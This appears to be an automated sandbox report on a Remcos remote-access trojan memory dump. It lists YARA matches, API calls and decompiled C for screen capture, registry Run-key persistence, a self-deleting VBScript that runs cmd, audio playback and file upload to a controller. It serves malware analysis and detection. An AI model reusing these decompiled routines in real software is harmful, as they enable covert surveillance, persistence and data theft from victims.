                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                          • String ID:
                                          • API String ID: 1084509184-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00411E51,0046C238,0046C5B4,0046C238,00000000,0046C238,00000000,0046C238,3.2.1 Pro), ref: 0040D1F9
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID:
                                          • API String ID: 2299586839-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: 0
                                          • API String ID: 0-4108050209
                                          • Opcode ID: 84d520a0f70926c0a60d58c698a882ed3c5d158336cfdaa718a2f8f638245402
                                          • Instruction ID: 656339de93b15354355cc6fc116552e81dda14c8a7802dd6a12fd3361ec49b7a
                                          • Opcode Fuzzy Hash: 84d520a0f70926c0a60d58c698a882ed3c5d158336cfdaa718a2f8f638245402
                                          • Instruction Fuzzy Hash: AC515170204B495BEF38456844457BFE3989B6E744F18298FFC82D7382CE5EED06825E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 81%
                                          			E00414906(void* __ecx, char __edx, void* __eflags, signed int _a4) {
                                          				void* _v12;
                                          				char _v13;
                                          				struct HDC__* _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				int _v32;
                                          				int _v36;
                                          				struct HDC__* _v40;
                                          				void* _v46;
                                          				intOrPtr _v50;
                                          				intOrPtr _v54;
                                          				char _v56;
                                          				char _v80;
                                          				intOrPtr _v84;
                                          				struct tagCURSORINFO _v100;
                                          				signed int _v106;
                                          				signed int _v108;
                                          				long _v116;
                                          				long _v120;
                                          				char _v124;
                                          				struct _ICONINFO _v144;
                                          				char _v168;
                                          				void* __ebx;
                                          				int _t114;
                                          				void* _t115;
                                          				void* _t116;
                                          				void* _t120;
                                          				int _t127;
                                          				void* _t128;
                                          				signed char _t140;
                                          				long _t146;
                                          				void* _t147;
                                          				int _t149;
                                          				void* _t157;
                                          				void* _t186;
                                          				void* _t188;
                                          				void* _t194;
                                          				int _t199;
                                          				void* _t204;
                                          				void* _t223;
                                          				signed int _t226;
                                          				struct HDC__* _t228;
                                          				struct HDC__* _t232;
                                          				struct tagBITMAPINFO* _t234;
                                          				void* _t235;
                                          				int _t241;
                                          
                                          				_v13 = __edx;
                                          				_t194 = __ecx;
                                          				_t232 = CreateDCA("DISPLAY", 0, 0, 0);
                                          				_v20 = _t232;
                                          				_t228 = CreateCompatibleDC(_t232);
                                          				_v40 = _t228;
                                          				_v32 = L00414D3D( *((intOrPtr*)(0x46bd78 + _a4 * 4)));
                                          				_t114 = L00414D89( *((intOrPtr*)(0x46bd78 + _a4 * 4)));
                                          				_t199 = _v32;
                                          				_v36 = _t114;
                                          				if(_t199 != 0 || _t114 != 0) {
                                          					_t115 = CreateCompatibleBitmap(_t232, _t199, _t114);
                                          					_v12 = _t115;
                                          					__eflags = _t115;
                                          					if(_t115 != 0) {
                                          						_t116 = SelectObject(_t228, _t115);
                                          						__eflags = _t116;
                                          						if(_t116 != 0) {
                                          							_v28 = _v28 & 0x00000000;
                                          							_v24 = _v24 & 0x00000000;
                                          							L00414DCA( *((intOrPtr*)(0x46bd78 + _a4 * 4)),  &_v28);
                                          							_t120 = StretchBlt(_t228, 0, 0, _v32, _v36, _t232, _v28, _v24, _v32, _v36, 0xcc0020);
                                          							__eflags = _t120;
                                          							if(_t120 == 0) {
                                          								goto L7;
                                          							}
                                          							__eflags = _v13;
                                          							if(_v13 != 0) {
                                          								_v100.cbSize = 0x14;
                                          								_t186 = GetCursorInfo( &_v100);
                                          								__eflags = _t186;
                                          								if(_t186 != 0) {
                                          									_t188 = GetIconInfo(_v100.hCursor,  &_v144);
                                          									__eflags = _t188;
                                          									if(_t188 != 0) {
                                          										_t241 = _v84 - _v144.yHotspot - _v24;
                                          										__eflags = _t241;
                                          										DeleteObject(_v144.hbmColor);
                                          										DeleteObject(_v144.hbmMask);
                                          										_t228 = _v40;
                                          										DrawIcon(_t228, _v100.ptScreenPos - _v144.xHotspot - _v28, _t241, _v100.hCursor);
                                          										_t232 = _v20;
                                          									}
                                          								}
                                          							}
                                          							_push( &_v124);
                                          							_t127 = 0x18;
                                          							_t128 = GetObjectA(_v12, _t127, ??);
                                          							__eflags = _t128;
                                          							if(_t128 == 0) {
                                          								goto L7;
                                          							} else {
                                          								_t226 = _v106 * _v108 & 0x0000ffff;
                                          								__eflags = _t226 - 1;
                                          								if(_t226 != 1) {
                                          									_push(4);
                                          									_pop(1);
                                          									_a4 = 1;
                                          									__eflags = _t226 - 1;
                                          									if(_t226 <= 1) {
                                          										L24:
                                          										__eflags = 1 << 1;
                                          										_push(0x2eb6edc);
                                          										L25:
                                          										_t234 = LocalAlloc(0x40, ??);
                                          										_t204 = 0x18;
                                          										_t234->bmiHeader = 0x28;
                                          										_t234->bmiHeader.biWidth = _v120;
                                          										_t234->bmiHeader.biHeight = _v116;
                                          										_t234->bmiHeader.biPlanes = _v108;
                                          										_t234->bmiHeader.biBitCount = _v106;
                                          										_t140 = _a4;
                                          										__eflags = _t140 - _t204;
                                          										if(_t140 < _t204) {
                                          											__eflags = 1;
                                          											_t234->bmiHeader.biClrUsed = 1 << _t140;
                                          										}
                                          										_t234->bmiHeader.biCompression = _t234->bmiHeader.biCompression & 0x00000000;
                                          										_t234->bmiHeader.biClrImportant = _t234->bmiHeader.biClrImportant & 0x00000000;
                                          										asm("cdq");
                                          										_t227 = _t226 & 0x00000007;
                                          										_t146 = (_t234->bmiHeader.biWidth + 7 + (_t226 & 0x00000007) >> 3) * (_a4 & 0x0000ffff) * _t234->bmiHeader.biHeight;
                                          										_t234->bmiHeader.biSizeImage = _t146;
                                          										_t147 = GlobalAlloc(0, _t146);
                                          										_a4 = _t147;
                                          										__eflags = _t147;
                                          										if(_t147 != 0) {
                                          											_t149 = GetDIBits(_t228, _v12, 0, _t234->bmiHeader.biHeight & 0x0000ffff, _t147, _t234, 0);
                                          											__eflags = _t149;
                                          											if(_t149 != 0) {
                                          												_v56 = 0x4d42;
                                          												_v54 = _t234->bmiHeader + _t234->bmiHeader.biSizeImage + _t234->bmiHeader.biClrUsed * 4 + 0xe;
                                          												_v50 = 0;
                                          												_t157 = _t234->bmiHeader + _t234->bmiHeader.biClrUsed * 4 + 0xe;
                                          												__eflags = _t157;
                                          												_v46 = _t157;
                                          												E004020D5(_t194,  &_v80);
                                          												E004020D5(_t194,  &_v168);
                                          												E0040251D(_t194,  &_v80, _t227, __eflags,  &_v56, 0xe);
                                          												E00403436( &_v80);
                                          												E0040251D(_t194,  &_v80, _t227, __eflags, _t234, 0x28);
                                          												E00403436( &_v80);
                                          												_t235 = _a4;
                                          												E0040251D(_t194,  &_v80, _t227, __eflags, _t235, _t234->bmiHeader.biSizeImage);
                                          												E00403436( &_v80);
                                          												DeleteObject(_v12);
                                          												GlobalFree(_t235);
                                          												DeleteDC(_v20);
                                          												DeleteDC(_t228);
                                          												E00402044(_t194, _t194, __eflags,  &_v168);
                                          												E00401FC7();
                                          												E00401FC7();
                                          												goto L32;
                                          											}
                                          											DeleteDC(_v20);
                                          											DeleteDC(_t228);
                                          											DeleteObject(_v12);
                                          											GlobalFree(_a4);
                                          											goto L2;
                                          										} else {
                                          											_push(_v20);
                                          											L8:
                                          											DeleteDC();
                                          											DeleteDC(_t228);
                                          											_push(_v12);
                                          											goto L5;
                                          										}
                                          									}
                                          									_push(8);
                                          									_pop(1);
                                          									_a4 = 1;
                                          									__eflags = _t226 - 1;
                                          									if(_t226 <= 1) {
                                          										goto L24;
                                          									}
                                          									_push(0x10);
                                          									_pop(1);
                                          									_a4 = 1;
                                          									__eflags = _t226 - 1;
                                          									if(_t226 <= 1) {
                                          										goto L24;
                                          									}
                                          									_t223 = 0x18;
                                          									__eflags = _t226 - _t223;
                                          									if(_t226 > _t223) {
                                          										_push(0x20);
                                          										_pop(1);
                                          										L23:
                                          										_a4 = 1;
                                          										goto L24;
                                          									}
                                          									_a4 = _t223;
                                          									_push(0x28);
                                          									goto L25;
                                          								}
                                          								goto L23;
                                          							}
                                          						}
                                          						L7:
                                          						_push(_t232);
                                          						goto L8;
                                          					} else {
                                          						DeleteDC(_t232);
                                          						DeleteDC(_t228);
                                          						_push(0);
                                          						L5:
                                          						DeleteObject();
                                          						goto L2;
                                          					}
                                          				} else {
                                          					L2:
                                          					E00402084(_t194, _t194, 0x45f6bc);
                                          					L32:
                                          					return _t194;
                                          				}
                                          			}

















































                                          0x00414bc2
                                          0x00414bc5
                                          0x00414bd0
                                          0x00414bde
                                          0x00414bed
                                          0x00414bf8
                                          0x00414c07
                                          0x00414c0f
                                          0x00414c16
                                          0x00414c25
                                          0x00414c2d
                                          0x00414c34
                                          0x00414c43
                                          0x00414c46
                                          0x00414c51
                                          0x00414c5c
                                          0x00414c64
                                          0x00000000
                                          0x00414c64
                                          0x00414b76
                                          0x00414b79
                                          0x00414b7e
                                          0x00414b88
                                          0x00000000
                                          0x00414b4c
                                          0x00414b4c
                                          0x004149ab
                                          0x004149b1
                                          0x004149b4
                                          0x004149b6
                                          0x00000000
                                          0x004149b6
                                          0x00414b4a
                                          0x00414a9f
                                          0x00414aa1
                                          0x00414aa2
                                          0x00414aa5
                                          0x00414aa8
                                          0x00000000
                                          0x00000000
                                          0x00414aaa
                                          0x00414aac
                                          0x00414aad
                                          0x00414ab0
                                          0x00414ab3
                                          0x00000000
                                          0x00000000
                                          0x00414ab7
                                          0x00414ab8
                                          0x00414abb
                                          0x00414ac4
                                          0x00414ac6
                                          0x00414ac7
                                          0x00414ac7
                                          0x00000000
                                          0x00414ac7
                                          0x00414abd
                                          0x00414ac0
                                          0x00000000
                                          0x00414ac0
                                          0x00000000
                                          0x00414a90
                                          0x00414a78
                                          0x004149aa
                                          0x004149aa
                                          0x00000000
                                          0x00414988
                                          0x0041498f
                                          0x00414992
                                          0x00414994
                                          0x00414996
                                          0x00414996
                                          0x00000000
                                          0x00414996
                                          0x00414967
                                          0x00414967
                                          0x0041496e
                                          0x00414c6b
                                          0x00414c71
                                          0x00414c71

                                          APIs
                                          • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00414921
                                          • CreateCompatibleDC.GDI32(00000000), ref: 0041492D
                                            • Part of subcall function 00414D3D: GetMonitorInfoW.USER32(?,?), ref: 00414D5D
                                            • Part of subcall function 00414D89: GetMonitorInfoW.USER32(?,?), ref: 00414DA9
                                          • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 0041497B
                                          • DeleteDC.GDI32(00000000), ref: 0041498F
                                          • DeleteDC.GDI32(00000000), ref: 00414992
                                          • DeleteObject.GDI32(?), ref: 00414996
                                          • SelectObject.GDI32(00000000,00000000), ref: 004149A0
                                          • DeleteDC.GDI32(00000000), ref: 004149B1
                                          • DeleteDC.GDI32(00000000), ref: 004149B4
                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 004149F0
                                          • GetCursorInfo.USER32(?,?,?), ref: 00414A0B
                                          • GetIconInfo.USER32(?,?), ref: 00414A1F
                                          • DeleteObject.GDI32(?), ref: 00414A44
                                          • DeleteObject.GDI32(?), ref: 00414A4D
                                          • DrawIcon.USER32 ref: 00414A5C
                                          • GetObjectA.GDI32(?,00000018,?), ref: 00414A70
                                          • LocalAlloc.KERNEL32(00000040,00000001,?,?), ref: 00414AD6
                                          • GlobalAlloc.KERNEL32(00000000,?,?,?), ref: 00414B3F
                                          • GetDIBits.GDI32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 00414B63
                                          • DeleteDC.GDI32(?), ref: 00414B76
                                          • DeleteDC.GDI32(00000000), ref: 00414B79
                                          • DeleteObject.GDI32(?), ref: 00414B7E
                                          • GlobalFree.KERNEL32 ref: 00414B88
                                          • DeleteObject.GDI32(?), ref: 00414C2D
                                          • GlobalFree.KERNEL32 ref: 00414C34
                                          • DeleteDC.GDI32(?), ref: 00414C43
                                          • DeleteDC.GDI32(00000000), ref: 00414C46
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Delete$Object$Info$CreateGlobal$AllocCompatibleFreeIconMonitor$BitmapBitsCursorDrawLocalSelectStretch
                                          • String ID: DISPLAY
                                          • API String ID: 517350757-865373369
                                          • Opcode ID: 5e19a8e7c5a1e7cfd16629166915223df8c5f8e766858db65ebc949d59fd66ec
                                          • Instruction ID: 04b928e990297c4dc387ef5bf1f87de0b325f6e157068eb4714aaf8e6101e2a9
                                          • Opcode Fuzzy Hash: 5e19a8e7c5a1e7cfd16629166915223df8c5f8e766858db65ebc949d59fd66ec
                                          • Instruction Fuzzy Hash: 1DB17171900319AFDB10DFA0DC45BEEBBB8EF44756F00402AF949E7290DB74AA45CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 98%
                                          			E0040B0E2(char _a4) {
                                          				char _v28;
                                          				char _v52;
                                          				char _v76;
                                          				char _v100;
                                          				char _v124;
                                          				char _v148;
                                          				char _v172;
                                          				short _v692;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __ebp;
                                          				void* _t53;
                                          				void* _t54;
                                          				void* _t57;
                                          				signed int _t61;
                                          				void* _t62;
                                          				void* _t78;
                                          				void* _t79;
                                          				void* _t92;
                                          				void* _t93;
                                          				signed char _t134;
                                          				void* _t243;
                                          				void* _t245;
                                          				void* _t246;
                                          				void* _t247;
                                          
                                          				E0041015B();
                                          				if( *0x46a9d4 != 0x30) {
                                          					L00409D73();
                                          				}
                                          				_t243 =  *0x46bd6b - 1; // 0x0
                                          				if(_t243 == 0) {
                                          					E0041537E(_t243);
                                          				}
                                          				if( *0x46ba75 != 0) {
                                          					E00417754(L00401EEB(0x46c0e0));
                                          				}
                                          				_t231 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
                                          				_t245 =  *0x46bb02 - 1; // 0x1
                                          				if(_t245 == 0) {
                                          					E00410D5C(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", L00401EEB(0x46c4e8));
                                          				}
                                          				_t246 =  *0x46bafb - 1; // 0x0
                                          				if(_t246 == 0) {
                                          					E00410D5C(0x80000002, _t231, L00401EEB(0x46c4e8));
                                          				}
                                          				_t247 =  *0x46bb00 - 1; // 0x0
                                          				if(_t247 == 0) {
                                          					E00410D5C(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", L00401EEB(0x46c4e8));
                                          				}
                                          				_t53 = E00402489();
                                          				_t54 = L00401F95(0x46c560);
                                          				_t57 = E00410A30(L00401F95(0x46c518), "exepath",  &_v692, 0x208, _t54, _t53);
                                          				_t248 = _t57;
                                          				if(_t57 == 0) {
                                          					GetModuleFileNameW(0,  &_v692, 0x208);
                                          				}
                                          				RegDeleteKeyA(0x80000001, L00401F95(0x46c518));
                                          				_t61 = SetFileAttributesW( &_v692, 0x80);
                                          				_t140 = 0x46c530;
                                          				asm("sbb bl, bl");
                                          				_t134 =  ~_t61 & 0x00000001;
                                          				_t62 = E004074E4(_t248);
                                          				_t249 = _t62;
                                          				if(_t62 != 0) {
                                          					_t140 = 0x46c530;
                                          					SetFileAttributesW(L00401EEB(0x46c530), 0x80);
                                          				}
                                          				E004030A6(_t134,  &_v124, E0040427F(_t134,  &_v52, E0043987F(_t134, _t140, _t249, L"Temp")), 0, _t249, L"\\update.vbs");
                                          				L00401EF0();
                                          				E00404405(_t134,  &_v28, L"On Error Resume Next\n", _t249, E0040427F(_t134,  &_v52, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n"));
                                          				L00401EF0();
                                          				_t250 = _t134;
                                          				if(_t134 != 0) {
                                          					E00403311(E004030A6(_t134,  &_v52, E00404405(_t134,  &_v76, L"while fso.FileExists(\"", _t250, E0040427F(_t134,  &_v100,  &_v692)), 0, _t250, L"\")\n"));
                                          					L00401EF0();
                                          					L00401EF0();
                                          					L00401EF0();
                                          				}
                                          				E00403311(E004030A6(_t134,  &_v100, E004030A6(_t134,  &_v76, E0040427F(_t134,  &_v52, L"fso.DeleteFile \""), 0, _t250,  &_v692), 0, _t250, L"\"\n"));
                                          				L00401EF0();
                                          				L00401EF0();
                                          				L00401EF0();
                                          				_t251 = _t134;
                                          				if(_t134 != 0) {
                                          					E0040766C(_t134,  &_v28, 0, L"wend\n");
                                          				}
                                          				_t78 = E004074E4(_t251);
                                          				_t252 = _t78;
                                          				if(_t78 != 0) {
                                          					E00403311(E004030A6(0x45f724,  &_v100, L00409E69( &_v76, L"fso.DeleteFolder \"", _t252, 0x46c530), 0, _t252, L"\"\n"));
                                          					L00401EF0();
                                          					L00401EF0();
                                          				}
                                          				_t79 = E0040427F(0x45f724,  &_v172, L"\"\"\", 0");
                                          				E00403311(E004030A6(0x45f724,  &_v100, E00403030( &_v76, E00404429(0x45f724,  &_v52, E0040427F(0x45f724,  &_v148, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), _t252,  &_a4), _t79), 0, _t252, "\n"));
                                          				L00401EF0();
                                          				L00401EF0();
                                          				L00401EF0();
                                          				L00401EF0();
                                          				L00401EF0();
                                          				E0040766C(0x45f724,  &_v28, 0, L"fso.DeleteFile(Wscript.ScriptFullName)");
                                          				_t92 = L00401EEB( &_v124);
                                          				_t93 = E00402489();
                                          				if(E00417947(L00401EEB( &_v28), _t93 + _t93, _t92, 0) != 0 && ShellExecuteW(0, L"open", L00401EEB( &_v124), 0x45f724, 0x45f724, 0) > 0x20) {
                                          					ExitProcess(0);
                                          				}
                                          				L00401EF0();
                                          				L00401EF0();
                                          				return L00401EF0();
                                          			}


                                          APIs
                                            • Part of subcall function 0041015B: TerminateProcess.KERNEL32(00000000,0046C500,0040D1DC), ref: 0041016B
                                            • Part of subcall function 0041015B: WaitForSingleObject.KERNEL32(000000FF), ref: 0041017E
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040B1DB
                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040B1EE
                                          • SetFileAttributesW.KERNEL32(?,00000080), ref: 0040B206
                                          • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040B234
                                            • Part of subcall function 00409D73: TerminateThread.KERNEL32(0040884B,00000000,0046C500,0040ADA3,?,0046C518,0046C500), ref: 00409D82
                                            • Part of subcall function 00409D73: UnhookWindowsHookEx.USER32(00000000), ref: 00409D92
                                            • Part of subcall function 00409D73: TerminateThread.KERNEL32(00408830,00000000,?,0046C518,0046C500), ref: 00409DA4
                                            • Part of subcall function 00417947: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,0045F724,00000000,00000000,?,0040B0BC,00000000,00000000), ref: 00417986
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,0045F724,0045F724,00000000), ref: 0040B457
                                          • ExitProcess.KERNEL32 ref: 0040B463
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                          • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Remcos$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                          • API String ID: 1861856835-219127200
                                          • Opcode ID: aa58ae454d06a12c87e700ab7569462d85b32519fc212bd3da7bf483e7861833
                                          • Instruction ID: 15120c8502facc1a94d34f6ce0dfcdb30145111763f7023834469a4ad8d2fcb5
                                          • Opcode Fuzzy Hash: aa58ae454d06a12c87e700ab7569462d85b32519fc212bd3da7bf483e7861833
                                          • Instruction Fuzzy Hash: 52915E31A101185ACB14FBA1DCA6AEF776AAF50744F10007FB806771E3EF785E4A869D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 86%
                                          			E004169CC(void* __ecx, void* __edx, char _a4) {
                                          				char _v24;
                                          				char _v28;
                                          				char _v52;
                                          				char _v76;
                                          				char _v100;
                                          				char _v124;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* _t25;
                                          				void* _t28;
                                          				void* _t43;
                                          				void* _t60;
                                          				void* _t63;
                                          				void* _t67;
                                          				CHAR* _t89;
                                          				void* _t109;
                                          				CHAR* _t110;
                                          				void* _t111;
                                          				void* _t114;
                                          				void* _t118;
                                          
                                          				_t103 = __edx;
                                          				_t67 = __ecx;
                                          				_t109 = __edx;
                                          				if(L00416C12( &_a4, __ecx, __ecx) == 0xffffffff) {
                                          					_t63 = L00401EEB( &_a4);
                                          					_t103 = 0x30;
                                          					L00401EFA( &_a4, 0x30, _t111, E0041805B( &_v28, 0x30, _t63));
                                          					L00401EF0();
                                          				}
                                          				_t25 = E00402489();
                                          				_t120 = _t25;
                                          				if(_t25 == 0) {
                                          					__eflags = PathFileExistsW(L00401EEB( &_a4));
                                          					if(__eflags != 0) {
                                          						goto L4;
                                          					} else {
                                          						E00402084(_t67, _t114 - 0x18, 0x45f6bc);
                                          						_push(0xa8);
                                          						E00404AA4(_t67, 0x46ca18, _t103, __eflags);
                                          					}
                                          				} else {
                                          					_t60 = L00401EEB( &_a4);
                                          					_t118 = _t114 - 0x18;
                                          					E004020EC(_t67, _t118, _t103, _t120, _t109);
                                          					L00417A4E(_t60);
                                          					_t114 = _t118 + 0x18;
                                          					L4:
                                          					_t28 = E004172DA( &_v124, _t67);
                                          					_t108 = E00403030( &_v28, E004030A6(_t67,  &_v76, L00409E69( &_v100, L"open \"", _t120,  &_a4), _t109, _t120, L"\" type "), _t28);
                                          					E004030A6(_t67,  &_v52, _t32, _t109, _t120, L" alias audio");
                                          					L00401EF0();
                                          					L00401EF0();
                                          					L00401EF0();
                                          					L00401EF0();
                                          					mciSendStringW(L00401EEB( &_v52), 0, 0, 0);
                                          					mciSendStringA("play audio", 0, 0, 0);
                                          					_t115 = _t114 - 0x18;
                                          					E00402084(0, _t114 - 0x18, 0x45f6bc);
                                          					_push(0xa9);
                                          					E00404AA4(0, 0x46ca18, _t32, 0);
                                          					_t43 = CreateEventA(0, 1, 0, 0);
                                          					while(1) {
                                          						L5:
                                          						 *0x46bea8 = _t43;
                                          						while(1) {
                                          							_t122 = _t43;
                                          							if(_t43 == 0) {
                                          								break;
                                          							}
                                          							__eflags =  *0x46bea6; // 0x0
                                          							if(__eflags != 0) {
                                          								mciSendStringA("pause audio", 0, 0, 0);
                                          								 *0x46bea6 = 0;
                                          							}
                                          							__eflags =  *0x46bea5; // 0x0
                                          							if(__eflags != 0) {
                                          								mciSendStringA("resume audio", 0, 0, 0);
                                          								 *0x46bea5 = 0;
                                          							}
                                          							mciSendStringA("status audio mode",  &_v24, 0x14, 0);
                                          							_t108 =  &_v24;
                                          							_t110 = "stopped";
                                          							_t89 = 0;
                                          							while(1) {
                                          								__eflags = ( *(_t108 + _t89) & 0x000000ff) -  *((intOrPtr*)(_t110 + _t89));
                                          								if(( *(_t108 + _t89) & 0x000000ff) !=  *((intOrPtr*)(_t110 + _t89))) {
                                          									break;
                                          								}
                                          								_t89 = _t89 + 1;
                                          								__eflags = _t89 - 8;
                                          								if(_t89 != 8) {
                                          									continue;
                                          								} else {
                                          									SetEvent( *0x46bea8);
                                          								}
                                          								break;
                                          							}
                                          							__eflags = WaitForSingleObject( *0x46bea8, 0x1f4);
                                          							if(__eflags != 0) {
                                          								_t43 =  *0x46bea8; // 0x0
                                          							} else {
                                          								CloseHandle( *0x46bea8);
                                          								_t43 = 0;
                                          								goto L5;
                                          							}
                                          						}
                                          						mciSendStringA("stop audio", 0, 0, 0);
                                          						mciSendStringA("close audio", 0, 0, 0);
                                          						E00402084(0, _t115 - 0x18, 0x45f6bc);
                                          						_push(0xaa);
                                          						E00404AA4(0, 0x46ca18, _t108, _t122);
                                          						L00401EF0();
                                          						goto L21;
                                          					}
                                          				}
                                          				L21:
                                          				return L00401EF0();
                                          			}

























                                          APIs
                                          • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 00416AB1
                                          • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00416AC5
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,0045F6BC), ref: 00416AEA
                                          • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,?,00000000,0046C238), ref: 00416B00
                                          • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00416B41
                                          • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 00416B59
                                          • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 00416B6D
                                          • SetEvent.KERNEL32 ref: 00416B8E
                                          • WaitForSingleObject.KERNEL32(000001F4), ref: 00416B9F
                                          • CloseHandle.KERNEL32 ref: 00416BAF
                                          • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00416BD1
                                          • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 00416BDB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                          • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                          • API String ID: 738084811-1354618412
                                          • Opcode ID: 2bcdb4351dccc8f7a303e70d098165e7762f089ba3e88cfe110070c02b5c2524
                                          • Instruction ID: 973dc57b0db8283a3ff3d0709b6d05c4eb7b4f2cac8df707c3dce394e9b06912
                                          • Opcode Fuzzy Hash: 2bcdb4351dccc8f7a303e70d098165e7762f089ba3e88cfe110070c02b5c2524
                                          • Instruction Fuzzy Hash: 755180716001086FD704BBB5DC92DFF3A6DDA41389B10413FF902A61E2EF799D8586AE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: _free$EnvironmentVariable$___from_strstr_to_strchr_wcschr
                                          • String ID:
                                          • API String ID: 2719235668-0
                                          • Opcode ID: 7ba57cf3f1bad6e4f919242c9e13473e351fc124188cd031a585d84597371e8b
                                          • Instruction ID: db3f33f972ccc31960696266c8304923ec6ec277b5ade58ccf050fecc9e19cec
                                          • Opcode Fuzzy Hash: 7ba57cf3f1bad6e4f919242c9e13473e351fc124188cd031a585d84597371e8b
                                          • Instruction Fuzzy Hash: 15D148B1908300AFFB21AF758881A6F77A8EF05354F14416FE945A7382EB7D9902C79D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00404A08: connect.WS2_32(?,?,00000010), ref: 00404A23
                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004064ED
                                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 00406524
                                          • __aulldiv.LIBCMT ref: 004065A6
                                          • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000,?,?,000186A0,00000000), ref: 00406614
                                          • ReadFile.KERNEL32(00000000,?,000186A0,?,00000000), ref: 0040662F
                                            • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                                            • Part of subcall function 00404E0B: closesocket.WS2_32(?), ref: 00404E11
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: File$CreatePointerReadSize__aulldivclosesocketconnectsend
                                          • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $[ERROR]$[Info]
                                          • API String ID: 1319223106-2190262076
                                          • Opcode ID: bb9b9e046f18df13769a8b787e7ac1b47d7a5fbf9c12ca0a2a4058909c6e6bd6
                                          • Instruction ID: 173749a7d42c5eabba2dba03019d43edcf8f50480dc145d367e539a2da324ad2
